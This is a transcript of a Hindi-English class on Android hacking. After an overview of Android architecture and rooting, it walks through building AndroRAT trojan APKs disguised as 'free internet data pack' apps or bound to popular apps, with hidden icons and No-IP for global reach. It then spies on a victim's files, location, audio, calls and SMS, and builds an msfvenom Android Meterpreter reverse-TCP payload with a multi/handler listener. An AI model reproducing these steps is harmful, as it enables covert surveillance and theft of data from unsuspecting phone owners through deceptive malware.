लेट्स स्टार्ट अवर सेशन। तो इसमें हमें सबसे पहले करना क्या है, सबसे पहले हमें मोबाइल का आर्किटेक्चर समझना पड़ेगा कि मोबाइल जो है वो बेसिकली किन लेवल्स में काम करता है। ठीक है, सो हमारे पास यहाँ पे है एंड्रॉइड डिवाइस। तो एंड्रॉइड के लिए हम एंड्रॉइड का आर्किटेक्चर अगर चेक करेंगे, which is image. Now just look at here. So I hope so आपको इमेज दिख रही है ना? ओके, सो इसमें है क्या बेसिकली कि सबसे पहले जो आपका एंड्रॉयड का आर्किटेक्चर होता है वो आपका बेस्ड होता है 4 लेयर्स में। ठीक है, जैसे सबसे पहली लेयर जो होती है उसे बोलते हैं हम एप्लीकेशन लेयर। अब एप्लीकेशन लेयर में है क्या, आप जितनी बार भी चीजों पे क्लिक करते हो, लाइक आपके ब्राउजर्स हो गए, आपके डिफरेंट टाइप्स ऑफ कैमरा बटन्स हो गए, आपकी जो भी एक्टिविटीज है जिन पे आप क्लिक करते हो, वो सारी एक्टिविटीज आपकी कहाँ से लॉन्च होती हैं, आपके एप्लीकेशन लेयर से। ठीक है, एप्लीकेशन लेयर के बाद आपकी आती है एप्लीकेशन फ्रेमवर्क। अब यहाँ पे आपके सारे एक्टिविटी मैनेजर्स हो गए, पैकेज मैनेजर्स हो गए, आपके रिसोर्सेज हो गए, नोटिफिकेशंस हो गए, जितने भी टाइप के आपके क्या होते हैं एप्लीकेशंस वाला पार्ट है, वो सारा आपको कहाँ पे मिलता है, एप्लीकेशन फ्रेमवर्क में मिलता है। ठीक है, नेक्स्ट उसी के बाद क्या होता है, आपके लाइब्रेरीज होती है। लाइब्रेरी ये जो तीसरी लेयर है इसके अंदर क्या होते हैं, तीन चीजें होती हैं। इसमें क्या होता है, तीसरी लेयर में यहाँ पे 3 सेक्शन में डिवाइड होती है। पहला होता है लाइब्रेरीज। अब लाइब्रेरीज के अंदर क्या मिलते हैं आपको, जैसे कि आपको कोई भी चीज लॉन्च करनी है, जैसे आपको लोकल डेटाबेस, एसक्यूएलाइट डेटाबेस मिल जाता है यहाँ पे। ठीक है, फ्रेमवर्क्स आपको मिल जाते हैं जो कि आपके मीडिया वगैरह को लॉन्च करने के लिए यूज करे जाते हैं। या फिर आपको जितने भी सर्टिफिकेट्स होते हैं, आपके ऑडियो मैनेजर हो गया, एसएसएल सर्टिफिकेट्स हो गए, या आपकी फाइल्स को लोड करने के लिए जो डिपेंडेंसी जिस लाइब्रेरीज में सेव होती हैं वो मिल जाती हैं। ठीक है, वो कहाँ पे मिलते हैं आपको, तीसरी लेयर के लाइब्रेरी सेक्शन में। नेक्स्ट होता है एंड्रॉइड रन टाइम। जब भी आप कोई भी यूटिलिटी को रन कराते हो, यानी किसी भी टाइप के एप्लीकेशन रन कराते हो, तो जहाँ पे वो एक्टिविटीज जब रन करती है तो एंड्रॉइड रन टाइम मैनेजर में डालविक वर्चुअल मशीन का यूज करती है। डालविक वर्चुअल मशीन आपको यहाँ पे मिलती है जो आपकी कोर लाइब्रेरीज को रन कराने की हेल्प करती है। उसके नीचे आपके पास होता है हार्डवेयर एब्स्ट्रक्शन लेयर। हार्डवेयर एब्स्ट्रक्शन लेयर क्या काम करती है, जितने भी अलग से आपके क्या कंपोनेंट्स ऐड किए जाते हैं दैट इज रिलेटेड टू हार्डवेयर इन योर सिस्टम, उनको हम हार्डवेयर एब्स्ट्रक्शन लेयर के अंदर ऐड करते हैं। ठीक है, यहाँ पे क्या है, जैसे कि आपका ग्राफिक कार्ड अलग से ऐड होता है, ऑडियो अलग से ऐड होती है, कैमरा अलग से ऐड होता है, बॉटल आपकी पर्टिकुलर कैप ब्लूटूथ अलग से ऐड होता है। ठीक है, जीपीएस अलग से हम ऐड कराते हैं, रेडियो वाईफाई सबके अलग अलग से कंपोनेंट्स यूज होते हैं। तो वो किसके अंदर आते हैं, सारे आपके हार्डवेयर एब्स्ट्रक्शन लेयर के अंदर आते हैं। नेक्स्ट होता है आपका कर्नल, लिनक्स कर्नल। हम इन 3 लेयर्स को तो एक्सेस कर सकते हैं, यानी कि हम एप्लीकेशन लेयर के अंदर जा सकते हैं, एप्लीकेशन फ्रेमवर्क में जा सकते हैं, प्लस हम अपनी लाइब्रेरीज और हार्डवेयर एब्स्ट्रक्शन लेयर के अंदर जा सकते हैं। बट लिनक्स कर्नल लेवल की हमें क्या नहीं होती, परमिशन नहीं होती। ये आपका रूट है एक तरीके से, या फिर आप कह सकते हो आपका एडमिनिस्ट्रेटर है। तो यहाँ पे आपके डिफरेंट टाइप लाइक डिस्प्ले ड्राइवर, जितने भी टाइप के ड्राइवर्स होते हैं, लाइक ब्लूटूथ डिवाइस अलग से ऐड किया गया कंपोनेंट, किसमें हार्डवेयर में तो उसका जो ड्राइवर होगा, वाईफाई का जो ड्राइवर होगा, उसकी जो ऑडियो ड्राइवर, स्पीकर ड्राइवर जितने भी होते हैं, सारे ड्राइवर्स आपको यहाँ पे मिलते हैं। एंड ये आपको बताते हैं कि आपको बेसिकली किस तरीके से यहाँ पे एक्टिविटीज के अंदर आप चेंजेस नहीं कर पाओगे, बिकॉज यहाँ पे क्या होता है कि आपकी जो पूरी लेयर होती है वो प्रोटेक्टेड होती है। हम जो भी मोबाइल फोन डिवाइस यूज करते हैं जैसे कि एंड्रॉइड वगैरह, तो उसमें होता क्या है यहाँ पे कि यहाँ पे हमें कंप्लीटली मिलता है किस टाइप का इंटरफेस मिलता है, यूजर इंटरफेस मिलता है, हमें कभी भी उसका एडमिनिस्ट्रेटिव इंटरफेस नहीं मिलता है। तो अगर आप अपने डिवाइस की इस लेयर को भी एक्सेस करना चाहते हो, इस आर्किटेक्चर लेयर को एक्सेस करना चाहते हो, तो उस केस में आपको अपने डिवाइस को रूट करना पड़ेगा। ठीक है, तो रूट करने के लिए मल्टीपल सॉफ्टवेयर आते हैं, आप किसी भी सॉफ्टवेयर का यूज कर सकते हो। यहाँ पे जैसे मैं यहाँ पे सर्च करूँ, जैसे किंग टू रूट करके आता है, या फिर किंगो करके आता है ना, या फिर आपका रूट किंग करके आता है। तो रूट सॉफ्टवेयर्स,
नाउ लुक एट, जैसे किंग रूट हो गया आपका, या फिर फ्रेम रूट हो गया आपका, या फिर आरएसएस रूट हो गया आपका, या फिर अनलॉक रूट हो गया आपका, है ना। ये सारे क्या होते हैं, रूट सॉफ्टवेयर्स होते हैं। ठीक, तो आप इनका यूज कर सकते हो और इनकी तरफ से अपने जितना भी फोन है उसको रूट पे एडमिनिस्ट्रेटिव परमिशन प्रोवाइड कर सकते हो। अगर आपको अपने फोन को रूट करना है तो आप रूट कर सकते हो। यहाँ पे मल्टीपल एप्स हैं, किंग रूट करके जो सबसे पहले चलता था, काफी फेमस ऐप है, या फिर आप अलग अलग टाइप के और रूट एप्स हैं उनका यूज कर सकते हो। बट रूट करने में क्या होता है कि जैसे कि आपके चांसेस होते हैं, यहाँ पे क्या चलता है, चांस बेस पे चलता है कि आपके जो एक सर्वे है, सर्वे के अकॉर्डिंग केवल 2% चांसेस ऐसे होते हैं कि आपका फोन जो है कम्प्लीटली बेटर वे में रूट होता है। जब ये सर्वे निकाला गया था तो ज्यादातर आपके सैमसंग के फोन आते थे, मोटरोला के फोन आते थे, तो उस केस में कि आपका जो फोन है उसमें 2% चांस होते थे कि वो रूट हो जाएगा, अदरवाइज रन रूट करते टाइम पे आपका फोन जो है वो क्रैश हो सकता है। तो ये एक्टिविटीज होती है यहाँ पे। तो लेट्स सी कि अगर आप रूट करते हो तो आप करके देखो, तो आपको पता चलेगा कि आपका फोन जो है वो उसको ले पा रहा है या फिर नहीं ले पा रहा है उसको कंप्लीट, ठीक है, पैकेजेस को। अब चलते हैं इसके प्रैक्टिकल पे। तो प्रैक्टिकल में सबसे पहले हमें क्या चाहिए, एक मशीन चाहिए। तो आई एम जस्ट गोइंग टू परफॉर्म दिस थिंग वाया द विंडोज। तो सबसे पहले विंडोज को रन करा लेते हैं यहाँ पे। सो गाइस, हम जो यहाँ पे सॉफ्टवेयर सबसे पहले यूज करने वाले हैं, दिस इज सॉफ्टवेयर नेम इज एंड्रोरैट। ठीक है, तो हम एंड्रोरैट यूज करेंगे। इस सॉफ्टवेयर को यूज करने के कुछ रूल्स हैं। पहला रूल है कि जिस ऑपरेटिंग सिस्टम के थ्रू आप इसको लॉन्च करने वाले हो, उस ऑपरेटिंग सिस्टम में आपका एंटीवायरस ऑफ होना चाहिए। एंड सेकेंड रूल कि जिस पर्टिकुलर जब भी आप इसको यूज करो तो उस ऑपरेटिंग सिस्टम के अंदर आपका जावा इंस्टॉल होना चाहिए। ठीक है, क्योंकि ज़ायर फाइल पे रन करता है और उसके लिए इसको क्या चाहिए, जावा चाहिए। तो फर्स्टली आई एम जस्ट गोइंग टू डिलीट दिस फाइल नाउ। आपको करना क्या है, एंड्रोरैट को लॉन्च करना है। तो जस्ट एंड्रोरैट को आप डबल क्लिक करोगे, लॉन्च हो जाएगा एप्लीकेशन। जब एप्लीकेशन लॉन्च हो जाए, नाउ लुक एट हियर। इस एप्लीकेशन में सबसे पहले आपके पास तीन तरीके का ऑप्शन है, एक तो बिल्ड एंड बाइंड का है, एक नो आईपी का है, एक बिल्ड का है। ठीक है, सो बिल्ड एंड बाइंड में क्या है कि आपने यहाँ पे अपनी आईपी यूज करनी है, पोर्ट नंबर यूज करना है, एंड उसके बाद टारगेट एपीके देनी है। टारगेट एपीके क्या होगी, आपने जैसे पहले से कोई याद होगा अगर आपको, जब आपने स्टार्टिंग करी थी क्लास, तो फर्स्ट क्लास में मैंने आपको बताया था कि एक वीडियो में दिखाया था कि बेसिकली आप आइडिया ऐप जिसके साथ क्या था, एक मलेशियस ऐप ऑलरेडी इंस्टॉल्ड था, अटैच था, सॉरी। तो वो क्या है, टारगेट एपीके। आप यहाँ से किसी की भी कोई भी एक टारगेट एपीके डाउनलोड करके रखो। लाइक आपने ट्रू कॉलर कर ली, पबजी कर ली, या फिर आपने डिफरेंट व्हाट्सएप कर ली, या मैसेंजर कर ली, किसी भी टाइप की कोई टारगेट एपीके आपने डाउनलोड, नेटफ्लिक्स की कर ली है ना, हॉटस्टार की कर ली, ये सारी क्या है टारगेट एपीके। आप क्या करो, पहले से डाउनलोड करके रखो और उस फाइल के साथ आप इसको क्या करो, अटैच कर दो। ठीक है, तो क्या होगा, आपका बिल्ड भी होगा और बाइंड भी कर जाएगा उसके साथ। दूसरा नो आईपी प्रोसीजर होता है। मैंने आपको एक प्रोसीजर बताया था नो आईपी का कि आप क्या कर सकते हो,
एक वेबसाइट है नो आईपी, है ना, आप उस पे जाओ और वहां पे जाके आप अपने को रजिस्टर्ड करो, ठीक है। रजिस्टर्ड करोगे तो ये आपको 3 डोमेन देती है फ्री। अब आपको करना क्या है, इसका एक सॉफ्टवेयर आएगा जो कि आपका सर्वर टाइप का है, उसको आपको इंस्टॉल कर लेना है यहाँ पर, और यूजर नेम एंड पासवर्ड डालना है और होस्ट नेम डालना है, जस्ट क्लिक टू अपडेट पे क्लिक कर देना है, तो ये आपको उससे कनेक्ट कर देगा। अब इसका यूज करने से आप इस अटैक को ओवर द नेटवर्क किसी भी पर्टिकुलर मशीन के ऊपर कर सकते हो। देयर इज नो, मतलब मशीन इन द सेंस किसी भी मोबाइल के ऊपर कर सकते हो ग्लोबली। बट फील्ड ऑप्शन अगर आप यूज करते हो तो उस केस में आपको क्या करना पड़ता है, यहाँ पे अपनी खुद की आईपी यूज करनी पड़ती है। तो हम इस समय क्या करेंगे, इंटरनेट कनेक्शन पे करेंगे विद द बिल्ड ऑप्शन ओनली। तो आईपी कॉन्फ़िग and click enter, so it will give me the IP 1.76, that is right, and the port number that is 1604, that is absolutely right, and framework जो हमें दे रहा है, नाम पूछ रहा है क्या नाम दे, तो मैंने जो बनाया है कि बनाया है फ्री इंटरनेट रिचार्ज या फ्री इंटरनेट डेटा पैक। सो फ्री इंटरनेट डेटा पैक के नाम से बनाया है। आप चाहते हो ये आइकन जब वहां पे इंस्टॉल हो तो हिडन हो जाए, तो हिडन पे क्लिक कर दो, अदरवाइज नहीं तो आपकी एक्टिविटी में वो आइकन नहीं दिखेगा। जस्ट क्लियर टू क्लिक ऑन गो एंड इट विल क्रिएट एन एपीके फाइल। से एपीके फाइल यहाँ पे बना देगा आपका, किससे, फ्री इंटरनेट डेटा पैक के नाम से। तो देखो मेरे पास बन गया, आ गई। क्या साइज है इसका, बस 68 KB की फाइल है, ठीक है। अब आपको करना क्या है, इस फाइल को सेंड करना है, मुझे इसका कोई काम नहीं है, जस्ट क्लोज इट। इस फाइल को सेंड करना है विक्टिम को, तो मैं इस फाइल को सेंड करूंगा विक्टिम को विद द डिफरेंट मशीन। तो डिफरेंट मशीन पे चलते हैं एंड उसको क्या करते हैं, सेंड कर देते हैं, ठीक है। सो यहाँ पे मैं एंड्रॉयड स्टूडियो का यूज करूंगा लॉन्च करने के लिए इसको। आप चाहो तो जेनी मोशन वगैरह अदर से वो आते हैं, उनको भी यूज कर सकते हो एमुलेटर्स, बट मैं यहाँ पे एंड्रॉयड एमुलेटर में यूज कर रहा हूँ एंड्रॉयड का डायरेक्टली, ठीक है। ओके, सो जब आपका ये लॉन्च हो जाए देन आपको करना क्या है, यहाँ पे ऑलरेडी मेरे पास ये एक दूसरी इंस्टॉल थी, तो पहले इसको अनइंस्टॉल मार देता हूँ मैं। ओके, लॉन्च नहीं हुई है, वेट हो रहा है, ठीक है। यस, ओके, इज देयर एनीवन मोर एप्लीकेशन, कोई और है? ठीक है, सो मैंने इसको अनइंस्टॉल कर दिया। अब इसको डाउनलोड करने के लिए मैं क्या कर रहा हूँ, क्रोम का यूज करूंगा, ठीक है। तो हम यहाँ पे ओपन कर लेते हैं इजी अपलोड की वेबसाइट, जिसपे मैंने उसको क्या किया है, अपलोड कर दिया है। तो जस्ट अपलोड देख लेते कहाँ हुआ है, तो उसको डाउनलोड करेंगे हम। ऑलरेडी मैंने उसको अपलोड कर दिया है, आप कैसे भी कर सकते हो, उसके में बस आपको इंस्टॉल कराना है विक्टिम में। तो इट्स अप टू यू कि आप कौन सा प्रोसीजर यूज करते हो इसको लॉन्च करने के लिए। जस्ट क्लिक टू डाउनलोड। ओके, ओके, ओपन किया मैंने। मुझसे एक्सेस मांग रहा है, क्या क्या चीजें एक्सेस कर सकते हैं, मैंने कहा ये सारी चीजें आप एक्सेस कर सकते हो। नाउ क्लिक टू नेक्स्ट। इंस्टॉल करें, मैंने कहा ओके। ओपन किया, एप्लीकेशन मेरी ओपन हो गई, ठीक है। अब आपको करना क्या है, यहाँ पे
आप आ जाओ विक्टिम के पास, मतलब वापस से अपने अटैकर के पास। तो आप जब अटैकर के पास आओगे एंड नाउ अगेन जस्ट लुक एट हियर। सो आपको करना क्या है, यहाँ पे जो मैंने आपको सेटअप दिया है उस सेटअप में आपको जाना है इस पे एंड्रो बाइंडर पे, और यहाँ नहीं सॉरी सॉरी, आपको जाना है एंड्रोइड पर, और यहाँ पे आपको मिलेगी एक ज़ैर फाइल, ठीक है, इसको आपको रन करा लेना है। रन कराते आपके पास कुछ ऐसा स्क्रीन आ जाएगी विंडो। इसमें आपको सर्वर पे जाना है एंड जस्ट क्लिक टू सिलेक्ट पोर्ट, एंड जो आपने पोर्ट नंबर दिया था दैट इज 1604, उसको आपको यहाँ पे टाइप कर देना 1604 एंड क्लिक टू ओके, ठीक है। उसके बाद इसको क्लोज कर दो एंड क्लिक अगेन टू ओपन दिस जार फाइल एंड वेट। नाउ लुक एट हियर, मेरे पास वहां पे मैंने रन किया था विक्टिम ने, और मुझे यहाँ पे क्या मिल रहा है, उसकी डिटेल मिल रही है। अब मैं तो वर्चुअल उस पे कर रहा हूँ, ठीक है, तो इसलिए मुझे क्या दिखा रहा है, फ्लैग्स वगैरह दिखा रहा है, IMEI नंबर दिखा रहा है, फोन नंबर दिखा रहा है ना, ये सारी चीज दिखा रहा है। अब मैंने इसको क्या किया, डबल क्लिक किया। तो डबल क्लिक में आप क्या क्या चीज कर सकते हो ये समझ लो, जैसे हम उसको फोन कर सकते हैं, तो मेरे पास जो जिसमें मैं कर रहे हैं हम, उसके पास फोन तो नंबर तो है नहीं, तो इसलिए हम SMS नहीं भेज सकते। ओके, टोस्ट मैसेज वगैरह भेज सकते हैं। टोस्ट मैसेज क्या होता है, स्क्रीन पे आपको विजिबल होता है, ठीक है। तो मैंने जैसे हेलो लिखा, ठीक है, एंड टोस्ट कर दिया, तो उस केस में क्या होगा कि वहां पे उसकी वजह से एक टोस्ट मैसेज आएगा उस पे एंड विजिबल होगा कि हेलो, है ना, स्क्रीन पे। तो उसके लिए मैं इसको वापस से वहां पे देख लो, मैं 3 ऑप्शन बता रहा हूँ, तीनों को मैं चला के दिखाऊंगा आपको। वाइब्रेशन मेन उस पे काम करता है, तो अगर आप जैसे वहां पे मेन सिस्टम 25 सेकंड का वाइब्रेशन देना चाहते हो, तो आप वाइब्रेशन दोगे तो क्या करेगा, हिलना चालू हो जाएगा, ठीक है, वाइब्रेट करना चालू हो जाएगा। ओपन यूआरएल, ओपन यूआरएल में जैसे मैंने दिया http://www.goggle.com, तो ये करेगा क्या, google.com को यहाँ से ओपन कर देगा, ठीक है। तो आपके ऊपर डिपेंड करता है आप क्या ओपन करना चाहते हो ब्राउज़र करते। तो मैं एक एक करके तीनों कमांड चलाने वाला हूँ यहाँ पे, एंड लेट्स सी कि तीनों कमांड चलाते हैं हमारे पास किस तरीके की एक्टिविटीज आती हैं, ठीक है। सो नाउ लुक एट हियर, मैंने क्या किया, सबसे पहला कमांड चलाया लेट टोस्ट। तो स्क्रीन पे देखो आपके पास हेलो लिख के आने लगा, मैं यहाँ पे लिखता हूँ हेलो सिस्टम हैक्ड, ठीक है, एंड क्लिक करता हूँ टोस्ट के ऊपर, तो देखो आ गया टोस्ट मैसेज। दूसरा वाइब्रेशन कर रहे हैं, तो वाइब्रेशन में कुछ नहीं होगा बिकॉज दिस इज अ मेन वर्चुअल सिस्टम। आप अगर उस पे करोगे मेन सिस्टम में, तो सिस्टम वाइब्रेट होता है, फोन वाइब्रेट होगा। दूसरा ओपन यूआरएल था, तो ओपन यूआरएल मैंने ब्राउज़र किया, तो नाउ जस्ट लुक एट हियर, ब्राउज़र करते ही ऑटोमेटिकली क्या हुआ, google.com वहां पे ओपन हो गया। मैं कोई और वेबसाइट ओपन कराना चाहूँ तो मैं कोई और वेबसाइट ओपन करा सकता हूँ, लाइक जैसे मैंने कहा इससे कि यहाँ पर ओपन करो फ्लिपकार्ट, ठीक है, एंड ब्राउज इट। तो ये क्या करेगा, फ्लिपकार्ट के ऊपर रिडायरेक्ट हो जाएगा। ये नहीं है फ्लिपकार्ट, अच्छा स्पेलिंग गलत है मेरी, FLIP, ओके, फ्लिपकार्ट एंड जस्ट ब्राउज इट। सो नाउ जस्ट लुक एट हियर, फ्लिपकार्ट यहाँ पे ओपन हो गई है ना। तो आप जो सी ब्राउज करना चाहते हो वो चीज ब्राउज यहाँ पे करा सकते हो। तो इट्स अप टू यू कि आप वहाँ पे क्या चीज को ब्राउज करा रहे हो। नेक्स्ट है उसके बाद कि आप यहाँ पे जाओ गेट इन्फो में टेक पिक्चर ले सकते हो। तो पिक्चर के लिए वेबकैम एक्सेस होना चाहिए, तो वेबकैम तो है नहीं उसमें वर्चुअल में, तो वेबकैम आप नहीं देख सकते, अदरवाइज आप कैमरा सेलेक्ट करो, टेक पिक्चर करो, पिक्चर खिंच जाती है। फाइल स्ट्रक्चर चेक कर सकते हैं, अब जिस उस पे गेट द फाइल ट्री करोगे, तो नाउ जस्ट लुक एट हियर, एंड्रॉइड म्यूजिक पॉडकास्ट, है ना, अलग अलग टाइप के क्या आ रहे हैं यहाँ पे आपके, वो आ रहे हैं DCIM, तो फोल्डर्स में कैमरे में चले गए। अब कैमरे में जो फोटो है उसको आप डाउनलोड भी कर सकते हो, यहाँ पे कोई फोटो नहीं पड़ी बिकॉज दैट इज अ वर्चुअल मशीन। देखो ये सारी चीजें हमने डाउनलोड करी फ्री रिचार्ज, है ना, ये डाउनलोड किया, ये डाउनलोड किया, PUBG क्रैक, जो जो चीजें, देखो अभी डाउनलोड पैक वाला ये किया था, तो देखो APK फाइल आ रही है। आप डाउनलोड करना चाहो इनको डाउनलोड कर लो, जस्ट क्लिक टू डाउनलोड, और ये डाउनलोड हो जाएंगे आपके डेस्कटॉप के अंदर, आपके पास रह रहे अटैकर के पास, ठीक है। नेक्स्ट, मूवीज वगैरह कुछ नहीं पड़ा, खाली है, अगर होता तो इसके अंदर से डेटा निकाल सकते थे, है ना। डेटा के अंदर चले गए तो देखो ये सारे डेटा GMS फाइल, यहाँ पे म्यूजिक वीडियो
यूट्यूब की फाइल्स है ना, कैशे भी है यहाँ पे अवेलेबल, तो आप कुछ भी निकाल सकते हो डेटा जो भी आपको यहाँ से मिल रहा हो, इट्स अप टू यू। दूसरा में फाइल स्ट्रक्चर कॉन्टेक्ट चला गया, वर्चुअल मशीन में कोई कॉन्टेक्ट तो मैंने सेव ही नहीं किए, तो देयर इज नो कॉन्टेक्ट टू रिटर्न, है ना, दिखा भी रहा रिक्वायर्ड। दूसरा कॉन्टेक्ट के बाद हम चले गए कॉल लॉग्स, तो कॉल लॉग्स भी नहीं है बिकॉज कोई कॉल तो हुई नहीं, आप मेन पे करोगे आपको कॉल लॉग मिल जाएंगी। एसएमएस स्ट्रीमिंग, आप एसएमएस भेज सकते हो किसी नंबर पे यहाँ से, लेकिन किससे, आपकी मेन जो बाय डिफॉल्ट जो आपका नंबर सेव होता है उस नंबर से मेल जाता है, मतलब मैसेज जाता है, लेकिन अगेन वर्चुअल मशीन तो वहां पे क्या है, एमुलेटर के अंदर कोई भी आपके पास नंबर नहीं है, ऐसा नहीं भेज सकते। स्ट्रीमिंग कर सकते हो, लोकलाइजेशन, उसकी लोकल स्ट्रीमिंग आपको करनी है, कहाँ पर वो है तो वो आप कर सकते हो, स्टार्ट जीपीएस पे या नेटवर्क पे, मैंने कहा जी जीपीएस पे स्टार्ट इसका स्ट्रीमिंग मैंने, तो अब ये लोकेशन देखो यहाँ पे, लोकेशन रिक्वेस्ट रिसीव्ड मिली, और ये आपको बता रहा है हो कहाँ पे आप, है ना, एग्जैक्टली नेटवर्क बेस पे करना चाहो नेटवर्क बेस पे कर सकते हो। सेंटर व्यू देख सकते हो कहाँ का है, यहाँ पे देखो दिखा रहा है ऑलमोस्ट पास में ही है ना सिस्टम। ओके, नेक्स्ट उसके बाद क्या है, स्ट्रीमिंग में आप ऑडियो सुन सकते हो, तो वो जो भी बोलेगा वो आपको क्या होगा, विजिबल हो जाएगा, तो आप यहाँ से बोल दो, वो बोल रहा है तो आपको यहाँ पे क्या हो रहा है, सुनाई दे रहा है, ऑडियो स्ट्रीमिंग रिक्वेस्ट रिसीव्ड, राइट। आप कुछ बोलोगे तो उसे सुनाई देगा, तो आप जो भी चीज बोलोगे वो उसको विजिबल होने लगेगी, सुनाई देने लगेगा। नेक्स्ट स्ट्रीमिंग में वीडियो स्ट्रीमिंग कर सकते हो, अब इसके लिए वेबकैम चाहिए, तो वेबकैम अगर है तो आप वीडियो स्ट्रीमिंग कर लो। सेंड एसएमएस या टोस्ट मैसेज हमने भेज के देख लिया, सेंड मैसेज, मैसेज भेज सकते हो, कॉल नंबर एंड मैसेज, बट अगेन आप मेन पे करो। गिव कॉल, कॉल किसी को करना है टारगेट कॉल तो टारगेट कर दो, किसी को कॉल कर दो। मॉनिटरिंग में कॉल सुन सकते हो, एसएमएस सुन सकते हो, मतलब एसएमएस जो कर रहा होगा वो देख सकते हो, कॉल पे जो बात कर रहा है वो सुन सकते हो। तो इसमें काफी सारे आपको ऑप्शन मिलते हैं देखने के लिए, बट वही है कि अगर आप सेम नेटवर्क पे, मतलब मेन सिस्टम पे करोगे, मेन मोबाइल में, तो आपको ज्यादा अच्छे से चीजें क्लियर होती है। क्लोज किया, इंटरनेट कनेक्शन खत्म हुआ एंड खत्म। तो ये था पहला तरीका जिसके तो हमने क्या किया है, एंड्रॉइड, देखो रिकॉर्डिंग आ गई, वहां पे हमने रिकॉर्डिंग करी थी, तो रिकॉर्डिंग आ गई, 1 KB की रिकॉर्डिंग है केवल। अब उसमें माउस वो नहीं लगा है, क्या कहते हैं, माइक, वरना आपको सुनाई देता कि क्या बोल रहे थे, जो बोल रहे थे वही आवाज आ जाती। तो वी डोंट नीड, डिलीट कर देते हैं। डाउनलोड में कुछ पड़ा है, नहीं हमने डाउनलोड किया नहीं है तो आएगा कहाँ से, है ना। तो गाइज ये था आपका एंड्रॉइड कि हम एंड्रॉइड का कैसे यूज करते हैं, तो मैं आपको सबसे पहले इसकी फाइल दे देता हूँ, ठीक है। सर में आया ना, यस सर। यस सर। अब दूसरा तरीका देखेंगे, पहले इसकी फाइल ले लो एंड्रॉइड की, ताकि आप रन करा पाओ, अपने मेन मशीन मत कराना, अपने वर्चुअल में ही इसको इंस्टॉल करना, और ध्यान रखना है एंटीवायरस ऑफ कर लेना, और जावा इंस्टॉल होनी चाहिए, वरना नहीं चलेगा। सो हम नेक्स्ट उसमें क्या करेंगे, दूसरे तरीके में हम यहाँ पर अपनी काली मशीन का यूज करने वाले हैं उसको लॉन्च करने के लिए। तो सबसे पहले आपको क्या करना है, अपने मेटा एक पेलोड क्रिएट करना है, जो कि हम क्रिएट करेंगे किसके थ्रू, एमएसएफ वैनम के थ्रू, यानी मेटास्प्लॉइट फ्रेमवर्क यहाँ पे यूज करने वाले हैं। तो सबसे पहले हमने टाइप किया एमएसएफ वैनम स्पेस -p, पेलोड बना रहे हैं किस टाइप का, एंड्रॉइड टाइप का, ठीक है। पेलोड मैंने डिजाइन किया एंड्रॉइड स्लैश कैसा, मेटाप्रेटर का कनेक्शन चाहिए मुझे, ठीक है, मेटाप्रेटर स्लैश रिवर्स अंडरस्कोर टीसीपी, कनेक्शन किससे लेंगे, रिवर्स अंडरस्कोर टीसीपी से। एल होस्ट आपको यहाँ पे यूज करना है, यानी कि अपना लिसनिंग होस्ट, तो लिसनिंग होस्ट में मुझे अपनी आईपी डालनी पड़ेगी, तो लेट्स चेक द आईपी। तो मैंने चेक किया ifconfig, ओके ठीक है, आई एम नॉट अ रूट यूजर हियर, सो दैट्स व्हाई इसने मुझे नहीं बताया, तो मैं sudo लगा लेता हूँ, sudo enter,
1.96. My IP is 1.96. Okay, so 192.168.1.96 स्पेस L पोर्ट जिससे आप लिसन करना चाहते हो, तो मैंने L पोर्ट में यहाँ पे यूज किया है 1337 एंड फिर उसका मैंने यूज किया स्पेस एंड मैंने फाइल दी रॉ टाइप की फाइल बनाओ जिसको सेव करो कहाँ पर /root/desktop/ फाइल का नाम दिया मैंने। तो फाइल का नाम जो हमने यहाँ पे यूज किया है दैट इज अगेन वही कर रहे हैं फ्री चार्ज। अब मैंने फ्री चार्ज लिखा फ्री रिचार्ज की जगह पे, ठीक है, ध्यान रखना freecharge.apk। और इसको लॉन्च करने से पहले हम इसके पहले sudo लगा देते हैं ताकि इसे रूट प्रिविलेजेस के साथ ये क्या कर जाए, रन कर जाए। तो sudo स्पेस now just press enter। ओके, कह रहा परमिशन नहीं है, sudo su फिर से टाइप करना पड़ेगा। now just press enter। सर शायद वो आर के बाद स्पेस चाहिए। नहीं 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 नहीं, ये एक्चुअली अभी मैंने इस मशीन को अभी लेटेस्ट में इंस्टॉल किया ना, तो इसलिए अभी इस पे इंस्टॉलेशन हो ही रही है इसकी। अच्छा चलो कोई नहीं, अगर यहाँ पे डायरेक्टली मुझे या तो दोबारा से इसमें रूट से लॉगिन करना पड़ेगा तब तो करेगा ये काम। कोई नहीं, मैं इसे दूसरी डायरेक्टली दे देता हूँ। जैसे कहता हूँ होम के अंदर स्लैश है यूजर, उसके अंदर सर आर के बाद, हेलो सर आर के बाद क्या? भी स्पेस चाहिए होती है ना? नहीं नहीं नहीं, नहीं देना है, हमें कोई स्पेस नहीं देना है। एंटर कर दिया, नाउ चलो बन गई। वो स्पेस इसलिए नहीं ले रहा गाइस, वो इसलिए बैश की वो अलग आ गई थी बिकॉज मैं रूट यूजर नहीं था उस समय। मैंने उसे कमांड में रूट पे आया हूँ बट मैं एग्जैक्टली लॉगिन मैंने जो है वो अपने करंट यूजर के उससे ही कर रखा था, इसलिए नहीं बना रहा था वो। ठीक है सर वो एमए नहीं से है। हेलो हाँ हाँ बोलो। सर एमए से पीसीबी है ना, उससे इजी पड़ता है। हाँ वो भी यूज कर सकते हो, देखो कई सारे तरीके हैं दोस्त करने के, आप कोई सा भी यूज करो, आपके ऊपर डिपेंड करता है। ठीक है, आप वो यस यूज सर। कर लो, आप एपीके बिल्डर आता है आप उसका यूज कर लो, उससे और इजी हो जाता है। बट डिपेंड करता है आप कैसे करो। तो देखो मेरे पास फाइल बन के रेडी हो गई। अब आपको क्या करना है, यहाँ पे सबसे पहले डेटाबेस कनेक्ट कर लेते हैं मेटास्प्लॉइट का। तो सर्विस PostgreSQL स्टार्ट MSF कंसोल एंटर। अब लिसनर स्टार्ट करते हैं। तो मैंने लिसनर यहाँ पे स्टार्ट कर दिया है ना। तो स्टार्ट करते हैं, हम यहाँ पे यूज करेंगे कौन सा यूज एक्सप्लॉइट, जिसे हम यूज करने वाले हैं मल्टी हैंडलर का। ठीक है, मल्टी हैंडलर। देन सेट करो पेलोड। तो सेट पेलोड जिसे हम सेट कर रहे हैं एंड्रॉइड टाइप ऑफ पेलोड विथ स्लैश मेटाप्रेटर स्लैश reverse underscore TCP। Enter and now just use show options to check all the possibilities and look at here। ये कह रहा है मुझे इसके पास नहीं है सेट, क्या नहीं सेट है इसका lhost। तो lhost दे देते हैं सेट lhost 192.168.1.92। प्रेस एंटर। lport हमने दूसरा दे रखा है तो सेट lport that is 1337। 